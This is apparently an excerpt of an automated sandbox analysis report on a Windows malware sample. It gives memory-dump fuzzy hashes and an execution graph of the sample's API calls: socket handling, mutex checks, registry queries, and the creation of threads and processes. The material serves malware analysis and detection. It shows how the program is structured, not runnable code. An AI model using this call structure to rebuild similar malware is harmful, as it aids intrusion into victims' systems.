                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fefccb532cf4d65a1aec3acc06194921ba6848dc1f79e74875cc2307cbc2603e
                                • Instruction ID: 32dfeec05eb7eff4e9fb570154f77a63e79784fcf3ea5c1c4c793deaeb06bc52
                                • Opcode Fuzzy Hash: fefccb532cf4d65a1aec3acc06194921ba6848dc1f79e74875cc2307cbc2603e
                                • Instruction Fuzzy Hash: F3F0BDF4D1520ADFDB44DFA9D545AAEBBF9BF49300F1085AA9818E3300EB309A00DF51
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8a6425fdb62aae8233e301b47e8823e1905e528e134542770797037b9e12e94
                                • Instruction ID: f11fa60c495bb99532ef9207f0dca857ea4a70f6c61e49346850ddb9d835dbef
                                • Opcode Fuzzy Hash: f8a6425fdb62aae8233e301b47e8823e1905e528e134542770797037b9e12e94
                                • Instruction Fuzzy Hash: 80F0A7B1604108FFAF04DF68DC84D9E7FFEEF45220B10C06AE809D7210DA31E9508755
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 87146a17e5321e215eda8d4181d45a1a924fc822387932baa9cf783d3fdede45
                                • Instruction ID: 4d372190be8af9c8746f164ee669a88c75967ea66da3783380f83fd5ff0e308b
                                • Opcode Fuzzy Hash: 87146a17e5321e215eda8d4181d45a1a924fc822387932baa9cf783d3fdede45
                                • Instruction Fuzzy Hash: 10E03976B002286F9314DA6AE884D6BBBEDFBCC660321807AE908C7310DA319C0186A0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a2636a1b92773fc347465067423149955b6bb399a8de0cf2e69cdd558a2cccfd
                                • Instruction ID: f81cea1b959299c1ec70bf8f5c21996d4215a4b74ebc6ec898e23b1e00907336
                                • Opcode Fuzzy Hash: a2636a1b92773fc347465067423149955b6bb399a8de0cf2e69cdd558a2cccfd
                                • Instruction Fuzzy Hash: F0F01DB4D1560ADFDB40DFB8D9457AEBFF4BB45301F1086AA9858E3280EB708A05DB51
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0b51228060445dc01fee12d2690c99e6e27a1927efdba6ae1b733fad1d770d39
                                • Instruction ID: 38c7d81b2af94399a08b827f6f323c26202568c613fddb1de2ccbf8e8925be21
                                • Opcode Fuzzy Hash: 0b51228060445dc01fee12d2690c99e6e27a1927efdba6ae1b733fad1d770d39
                                • Instruction Fuzzy Hash: 27F0B2F8D14209EFDB40DFB9D845AEDBBF8EB49300F0089AAD818E3200EB705A44DB40
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d6f151df5b9b4bf793e4ae9ac363ed599c21f9201d790a26b37c71b6bfddc5c
                                • Instruction ID: 0cf33b27965ef49116665beac9826324e42b5417bfc25ac0a58fa0c08243a810
                                • Opcode Fuzzy Hash: 8d6f151df5b9b4bf793e4ae9ac363ed599c21f9201d790a26b37c71b6bfddc5c
                                • Instruction Fuzzy Hash: F3F090B4D4020ACFCB08CFA5D941AEEBBF4FB45311F1481BAD81897250DB388686CB40
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5cc3f94d91fd1ff05d8d93217d9203dc47947f3e935da0cb9e18fa6050f9ce56
                                • Instruction ID: 4c24ab90d6f85b9fdfa5235b511b1e6f395ca1e15b453f05fd09258e5efbd889
                                • Opcode Fuzzy Hash: 5cc3f94d91fd1ff05d8d93217d9203dc47947f3e935da0cb9e18fa6050f9ce56
                                • Instruction Fuzzy Hash: 49F0B7B5D14209EFDB40DFB9D545AADFBF8AB49344F0099AAD819E3310E77056449B40
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb032421cf907026aeaa374aa0c49c03aa1a47d86e3d3bb04b5ea76c6dab5026
                                • Instruction ID: 93bc6d2583beb33463b2ceca080d0d2239dd46fcc57c8f8040b68ae1c8d05b58
                                • Opcode Fuzzy Hash: bb032421cf907026aeaa374aa0c49c03aa1a47d86e3d3bb04b5ea76c6dab5026
                                • Instruction Fuzzy Hash: F6F0B2F4D10209EFDB40EFB9D8466ADBBF4EB48301F0089AAD818E3200EB7486458B41
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 21ec231c7e8f4935c1938bab433b56b624815eabfb4a9018bacb948ee7645036
                                • Instruction ID: 64ac18c74fee13e60c1b42790047cf4454d9d294e4247a20677346593cecc8a7
                                • Opcode Fuzzy Hash: 21ec231c7e8f4935c1938bab433b56b624815eabfb4a9018bacb948ee7645036
                                • Instruction Fuzzy Hash: A1F0DAF0D1421A9FDB54DFA9C842AAEBBF4AB48310F1089AADD18E7201DB7096008F91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aba1868876b1336652fb450289ff59d9d9b333e912aff2165d135c8b1cc47e45
                                • Instruction ID: dcfec20effb8ac874227dc79a772493e525b9798d0b6fafb1e37a27187aaf1b3
                                • Opcode Fuzzy Hash: aba1868876b1336652fb450289ff59d9d9b333e912aff2165d135c8b1cc47e45
                                • Instruction Fuzzy Hash: E3F01DF0D1421A9FEB54DFA9C856BAEBFF4AB08300F00895AD918E7241EB748604CF91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: afc85b0207473663bd707acbdd15ae03f5958bad489a1377d3e480925a05605c
                                • Instruction ID: a20826ebb84e51e5051fbdeb518b10b370a8a66e58fd0b0557166fd534b63251
                                • Opcode Fuzzy Hash: afc85b0207473663bd707acbdd15ae03f5958bad489a1377d3e480925a05605c
                                • Instruction Fuzzy Hash: A1F0BEB48146899FCB55CFA8C485BADBFF0AF06318F0485EAC818A72A2CB304601CB40
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4d92f8891fbb158ee5144b5077c4eee6324a8dea4fbc2e76335650681c2f0e4
                                • Instruction ID: 706692a67884a84fd8a272ae467f6e55dcd2626c06fd1238eb004b0d1f6e2e8b
                                • Opcode Fuzzy Hash: a4d92f8891fbb158ee5144b5077c4eee6324a8dea4fbc2e76335650681c2f0e4
                                • Instruction Fuzzy Hash: B5F0C9B4D14208EFDB50DFB8D545AADBFF4AB09201F1086AAD849E3200E7349A44DF41
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc68fe7062438d8a4839e0bb178a2f3fd56ad0254a828e88a3536315937025a1
                                • Instruction ID: 4be3a88377a02821ef7fb4784eb82194df4a6b219f80c208b66eb97d96c2a22c
                                • Opcode Fuzzy Hash: bc68fe7062438d8a4839e0bb178a2f3fd56ad0254a828e88a3536315937025a1
                                • Instruction Fuzzy Hash: 79F0A0F1914248CFE7109BAAE808BAD7EBD9B8A340F40C1219C0A6A685DE701A05CE22
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52bc6cbb672c3283246c3b36d76afe7d5ab7f62ef1333ae80da1abe33a205c59
                                • Instruction ID: a0a5c20f2a2f85c820f53327f7728e7b8f28961e414b660bb7ad378824593632
                                • Opcode Fuzzy Hash: 52bc6cbb672c3283246c3b36d76afe7d5ab7f62ef1333ae80da1abe33a205c59
                                • Instruction Fuzzy Hash: CDE0C2F080124CDBEB04EFB0D404AAD7BF8AB01204F5005A9CC0953340DB340E88E782
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2e9da87a3890ba3870d43eec6296d2b04ee05146535f739fb1c00c3c7c5722ef
                                • Instruction ID: 490c67b4b19d00f99db8c77762a17dd1cf6eb8350e1ca1ab2fe7aec1f20acd96
                                • Opcode Fuzzy Hash: 2e9da87a3890ba3870d43eec6296d2b04ee05146535f739fb1c00c3c7c5722ef
                                • Instruction Fuzzy Hash: 8BE0D8B1A54646CFD700CF79C905A8ABFF0AF04324F64C199D435D72E2E77A45058F40
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 88f47cc78c6943eeea5669c35b32de5d52493ed2f6d512966cef3dde1b873b01
                                • Instruction ID: 6dfe5401a5a5eabb2b4fe30302bd1c52ffe9ea535b01f9743452996ac5681d12
                                • Opcode Fuzzy Hash: 88f47cc78c6943eeea5669c35b32de5d52493ed2f6d512966cef3dde1b873b01
                                • Instruction Fuzzy Hash: FEE0B6F4E54209DFD740EFB9C905A9EBBF4BF08200F1185A9D419E7251E7B596048F91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4e4e95d31fc772668461297cf6f9674c8a9832ae534ecdcfa91aebf0274fc70f
                                • Instruction ID: 701ef1b1d914cc1c3f87d7133ba0ddf6affbc443195816c2d7e34448bcd0e392
                                • Opcode Fuzzy Hash: 4e4e95d31fc772668461297cf6f9674c8a9832ae534ecdcfa91aebf0274fc70f
                                • Instruction Fuzzy Hash: D2D0C2B3C001258BCB20AFE8AD055EFFF34AF05620B414216E911AB550D3300620CBC0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                • Instruction ID: d7d6617310828fde546bdeeefdf4b623536e2e77ab71d0b0e628a64dd4077659
                                • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                • Instruction Fuzzy Hash: BDD09EB2D40139E78B10AFE9DC058DFFF79EF05650F418126E915A7100D3715A21DBD1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 95d047af0c83dec0c81391c8593aac41a729fa7b6896b3bf663b4edd83a5e32c
                                • Instruction ID: b49558546daad129e658c821658147a98f209701d5158bee6bab0c3ffd92ff73
                                • Opcode Fuzzy Hash: 95d047af0c83dec0c81391c8593aac41a729fa7b6896b3bf663b4edd83a5e32c
                                • Instruction Fuzzy Hash: 38D0A77091521CCFEB10CB00E840BDCBB7AFB8A210F0082D5D00D93500CB701E889F51
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 216f6c36e53ac6c38e844b3c3927887a66a5b93e2e2f9ae608582f177187dc98
                                • Instruction ID: 988296c7bb4e7b036c974151fbeba5feb7e0a7f214c593d9f3ad51d7ccada1da
                                • Opcode Fuzzy Hash: 216f6c36e53ac6c38e844b3c3927887a66a5b93e2e2f9ae608582f177187dc98
                                • Instruction Fuzzy Hash: ABD012722141089E6B51EE95FC40C5277ECBB147007408822ED0CCB131E631E434D791
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a5c9662e0cab4f51e30e038b906833da209c7054e87fa8ac1f5922ed90a9dab
                                • Instruction ID: 42bfc0551f65a9877ba68b8df2bbe46c7b124d741c5c2665bbf137aa2d00b4e3
                                • Opcode Fuzzy Hash: 0a5c9662e0cab4f51e30e038b906833da209c7054e87fa8ac1f5922ed90a9dab
                                • Instruction Fuzzy Hash: E2D0A7B20147444FD341AB95A40E2253F746B02301F4440A6FC4C45562DFA44818DB12
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28a975d12ca98c6652fd6868ada04c0bf1f8e64b8a0f50a7754874bd4684c05f
                                • Instruction ID: 605de658b9037fc507c233f8149740c7f7149fccbad212ef4b175527f6b96780
                                • Opcode Fuzzy Hash: 28a975d12ca98c6652fd6868ada04c0bf1f8e64b8a0f50a7754874bd4684c05f
                                • Instruction Fuzzy Hash: 8DC08C62028DC04EF31AA7208C1EF987F40FB66324F15CB83D4C5488F1DB2D445AE706
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6f02ca06828eeedd61c91c8a7e24d578c3c727df63cf53d1dce69e39679162b3
                                • Instruction ID: 44d3b4f951b2cd8ab36269803ee8b758162a1d00981e4728ba07c78c226b13d0
                                • Opcode Fuzzy Hash: 6f02ca06828eeedd61c91c8a7e24d578c3c727df63cf53d1dce69e39679162b3
                                • Instruction Fuzzy Hash: 38C08CB1020A088FD2006B96F80F7283FF86702302F800022F80C019118FB01408EE5A
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 08029a34fb939c4ef7827255e7f951b6426730a6defb3a4f90d491d189b90e84
                                • Instruction ID: 4ba0d2d9a367c9427718fe8d474caa5207daa6138d5e26c5a3f3c9c99ae24108
                                • Opcode Fuzzy Hash: 08029a34fb939c4ef7827255e7f951b6426730a6defb3a4f90d491d189b90e84
                                • Instruction Fuzzy Hash: 86B092E5169200A6780062A44890F2F9492BBB2710B808805260A0200089A054A4936B

                                Execution Graph

                                Execution Coverage: 1.8%
                                Dynamic/Decrypted Code Coverage: 0%
                                Signature Coverage: 3.5%
                                Total number of Nodes: 654
                                Total number of Limit Nodes: 13
                                execution_graph 45774 404e06 WaitForSingleObject 45775 404e20 SetEvent CloseHandle 45774->45775 45776 404e37 closesocket 45774->45776 45777 404eb8 45775->45777 45778 404e44 45776->45778 45779 404e5a 45778->45779 45787 4050c4 83 API calls 45778->45787 45781 404e6c WaitForSingleObject 45779->45781 45782 404eae SetEvent CloseHandle 45779->45782 45788 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45781->45788 45782->45777 45784 404e7b SetEvent WaitForSingleObject 45789 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45784->45789 45786 404e93 SetEvent CloseHandle CloseHandle 45786->45782 45787->45779 45788->45784 45789->45786 45790 40163e 45791 401646 45790->45791 45792 401649 45790->45792 45793 401688 45792->45793 45795 401676 45792->45795 45798 43229f 45793->45798 45797 43229f new 22 API calls 45795->45797 45796 40167c 45797->45796 45802 4322a4 45798->45802 45800 4322d0 45800->45796 45802->45800 45805 439adb 45802->45805 45812 440480 7 API calls 2 library calls 45802->45812 45813 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45802->45813 45814 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45802->45814 45810 443649 ___crtLCMapStringA 45805->45810 45806 443687 45816 43ad91 20 API calls __dosmaperr 45806->45816 45808 443672 RtlAllocateHeap 45809 443685 45808->45809 45808->45810 45809->45802 45810->45806 45810->45808 45815 440480 7 API calls 2 library calls 45810->45815 45812->45802 45815->45810 45816->45809 45817 43263c 45818 432648 CallCatchBlock 45817->45818 45843 43234b 45818->45843 45820 43264f 45822 432678 45820->45822 46107 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 45820->46107 45827 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45822->45827 46108 441763 5 API calls _ValidateLocalCookies 45822->46108 45824 432691 45826 
432697 CallCatchBlock 45824->45826 46109 441707 5 API calls _ValidateLocalCookies 45824->46109 45833 432717 45827->45833 46110 4408e7 35 API calls 5 library calls 45827->46110 45854 4328c9 45833->45854 45838 432743 45840 43274c 45838->45840 46111 4408c2 28 API calls _Atexit 45838->46111 46112 4324c2 13 API calls 2 library calls 45840->46112 45844 432354 45843->45844 46113 4329da IsProcessorFeaturePresent 45844->46113 45846 432360 46114 436cd1 10 API calls 4 library calls 45846->46114 45848 432365 45853 432369 45848->45853 46115 4415bf 45848->46115 45851 432380 45851->45820 45853->45820 46181 434c30 45854->46181 45857 43271d 45858 4416b4 45857->45858 46183 44c239 45858->46183 45860 432726 45863 40d3f0 45860->45863 45861 4416bd 45861->45860 46187 443d25 35 API calls 45861->46187 46189 41a8da LoadLibraryA GetProcAddress 45863->46189 45865 40d40c 46196 40dd83 45865->46196 45867 40d415 46211 4020d6 45867->46211 45870 4020d6 28 API calls 45871 40d433 45870->45871 46217 419d87 45871->46217 45875 40d445 46243 401e6d 45875->46243 45877 40d44e 45878 40d461 45877->45878 45879 40d4b8 45877->45879 46249 40e609 45878->46249 45880 401e45 22 API calls 45879->45880 45882 40d4c6 45880->45882 45886 401e45 22 API calls 45882->45886 45885 40d47f 46264 40f98d 45885->46264 45887 40d4e5 45886->45887 46280 4052fe 45887->46280 45891 40d4f4 46285 408209 45891->46285 45899 40d4a3 45901 401fb8 11 API calls 45899->45901 45903 40d4ac 45901->45903 46102 4407f6 GetModuleHandleW 45903->46102 45904 401fb8 11 API calls 45905 40d520 45904->45905 45906 401e45 22 API calls 45905->45906 45907 40d529 45906->45907 46302 401fa0 45907->46302 45909 40d534 45910 401e45 22 API calls 45909->45910 45911 40d54f 45910->45911 45912 401e45 22 API calls 45911->45912 45913 40d569 45912->45913 45914 40d5cf 45913->45914 46306 40822a 28 API calls 45913->46306 45915 401e45 22 API calls 45914->45915 45921 40d5dc 45915->45921 45917 40d594 45918 401fc2 28 API calls 45917->45918 45919 40d5a0 45918->45919 45922 401fb8 11 API 
calls 45919->45922 45920 40d650 45926 40d660 CreateMutexA GetLastError 45920->45926 45921->45920 45923 401e45 22 API calls 45921->45923 45924 40d5a9 45922->45924 45925 40d5f5 45923->45925 46307 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45924->46307 45929 40d5fc OpenMutexA 45925->45929 45927 40d987 45926->45927 45928 40d67f 45926->45928 45932 401fb8 11 API calls 45927->45932 45971 40d9ec 45927->45971 45930 40d688 45928->45930 45931 40d68a GetModuleFileNameW 45928->45931 45935 40d622 45929->45935 45936 40d60f WaitForSingleObject CloseHandle 45929->45936 45930->45931 46310 4192ae 33 API calls 45931->46310 45956 40d99a ___scrt_fastfail 45932->45956 45934 40d5c5 45934->45914 45938 40dd0f 45934->45938 46308 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45935->46308 45936->45935 46340 41239a 30 API calls 45938->46340 45939 40d6a0 45940 40d6f5 45939->45940 45942 401e45 22 API calls 45939->45942 45944 401e45 22 API calls 45940->45944 45950 40d6bf 45942->45950 45952 40d720 45944->45952 45945 40dd22 46341 410eda 65 API calls ___scrt_fastfail 45945->46341 45947 40d63b 45947->45920 46309 41239a 30 API calls 45947->46309 45948 40dcfa 45978 40dd6a 45948->45978 46342 402073 28 API calls 45948->46342 45950->45940 45957 40d6f7 45950->45957 45965 40d6db 45950->45965 45951 40d731 45953 401e45 22 API calls 45951->45953 45952->45951 46314 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 45952->46314 45963 40d73a 45953->45963 46322 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 45956->46322 46312 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 45957->46312 45958 40dd3a 46343 4052dd 28 API calls 45958->46343 45970 401e45 22 API calls 45963->45970 45965->45940 46311 4067a0 36 API calls ___scrt_fastfail 45965->46311 45967 40d70d 45967->45940 46313 4066a6 58 API calls 45967->46313 45973 40d755 45970->45973 45975 401e45 22 API calls 45971->45975 45980 401e45 22 API calls 45973->45980 45976 40da10 45975->45976 46323 402073 28 API calls 45976->46323 46344 413980 
161 API calls 45978->46344 45983 40d76f 45980->45983 45985 401e45 22 API calls 45983->45985 45984 40da22 46324 41215f 14 API calls 45984->46324 45987 40d789 45985->45987 45990 401e45 22 API calls 45987->45990 45988 40da38 45989 401e45 22 API calls 45988->45989 45991 40da44 45989->45991 45994 40d7a3 45990->45994 46325 439867 39 API calls _swprintf 45991->46325 45993 40d810 45993->45956 46000 401e45 22 API calls 45993->46000 46031 40d89f ___scrt_fastfail 45993->46031 45994->45993 45996 401e45 22 API calls 45994->45996 45995 40da51 45997 40da7e 45995->45997 46326 41aa4f 81 API calls ___scrt_fastfail 45995->46326 46005 40d7b8 _wcslen 45996->46005 46327 402073 28 API calls 45997->46327 46001 40d831 46000->46001 46007 401e45 22 API calls 46001->46007 46002 40da70 CreateThread 46002->45997 46597 41b212 10 API calls 46002->46597 46003 40da8d 46328 402073 28 API calls 46003->46328 46005->45993 46011 401e45 22 API calls 46005->46011 46006 40da9c 46329 4194da 79 API calls 46006->46329 46009 40d843 46007->46009 46015 401e45 22 API calls 46009->46015 46010 40daa1 46012 401e45 22 API calls 46010->46012 46013 40d7d3 46011->46013 46014 40daad 46012->46014 46016 401e45 22 API calls 46013->46016 46018 401e45 22 API calls 46014->46018 46017 40d855 46015->46017 46019 40d7e8 46016->46019 46021 401e45 22 API calls 46017->46021 46020 40dabf 46018->46020 46315 40c5ed 31 API calls 46019->46315 46024 401e45 22 API calls 46020->46024 46023 40d87e 46021->46023 46029 401e45 22 API calls 46023->46029 46026 40dad5 46024->46026 46025 40d7fb 46316 401ef3 28 API calls 46025->46316 46033 401e45 22 API calls 46026->46033 46028 40d807 46317 401ee9 11 API calls 46028->46317 46030 40d88f 46029->46030 46318 40b871 46 API calls _wcslen 46030->46318 46319 412338 31 API calls 46031->46319 46034 40daf5 46033->46034 46330 439867 39 API calls _swprintf 46034->46330 46037 40d942 ctype 46040 401e45 22 API calls 46037->46040 46039 40db02 46041 401e45 22 API calls 46039->46041 46044 40d959 46040->46044 46042 
40db0d 46041->46042 46043 401e45 22 API calls 46042->46043 46045 40db1e 46043->46045 46044->45971 46046 401e45 22 API calls 46044->46046 46331 408f1f 163 API calls _wcslen 46045->46331 46047 40d976 46046->46047 46320 419bca 28 API calls 46047->46320 46050 40d982 46321 40de34 88 API calls 46050->46321 46051 40db33 46053 401e45 22 API calls 46051->46053 46055 40db3c 46053->46055 46054 40db83 46056 401e45 22 API calls 46054->46056 46055->46054 46057 43229f new 22 API calls 46055->46057 46062 40db91 46056->46062 46058 40db53 46057->46058 46059 401e45 22 API calls 46058->46059 46060 40db65 46059->46060 46064 40db6c CreateThread 46060->46064 46061 40dbd9 46063 401e45 22 API calls 46061->46063 46062->46061 46065 43229f new 22 API calls 46062->46065 46070 40dbe2 46063->46070 46064->46054 46595 417f6a 101 API calls __EH_prolog 46064->46595 46066 40dba5 46065->46066 46067 401e45 22 API calls 46066->46067 46068 40dbb6 46067->46068 46073 40dbbd CreateThread 46068->46073 46069 40dc4c 46071 401e45 22 API calls 46069->46071 46070->46069 46072 401e45 22 API calls 46070->46072 46075 40dc55 46071->46075 46074 40dbfc 46072->46074 46073->46061 46599 417f6a 101 API calls __EH_prolog 46073->46599 46077 401e45 22 API calls 46074->46077 46076 40dc99 46075->46076 46079 401e45 22 API calls 46075->46079 46337 4195f8 79 API calls 46076->46337 46080 40dc11 46077->46080 46082 40dc69 46079->46082 46332 40c5a1 31 API calls 46080->46332 46081 40dca2 46338 401ef3 28 API calls 46081->46338 46087 401e45 22 API calls 46082->46087 46084 40dcad 46339 401ee9 11 API calls 46084->46339 46090 40dc7e 46087->46090 46088 40dc24 46333 401ef3 28 API calls 46088->46333 46089 40dcb6 CreateThread 46095 40dce5 46089->46095 46096 40dcd9 CreateThread 46089->46096 46600 40e18d 121 API calls 46089->46600 46335 439867 39 API calls _swprintf 46090->46335 46092 40dc30 46334 401ee9 11 API calls 46092->46334 46095->45948 46097 40dcee CreateThread 46095->46097 46096->46095 46594 410b5c 137 API calls 46096->46594 46097->45948 
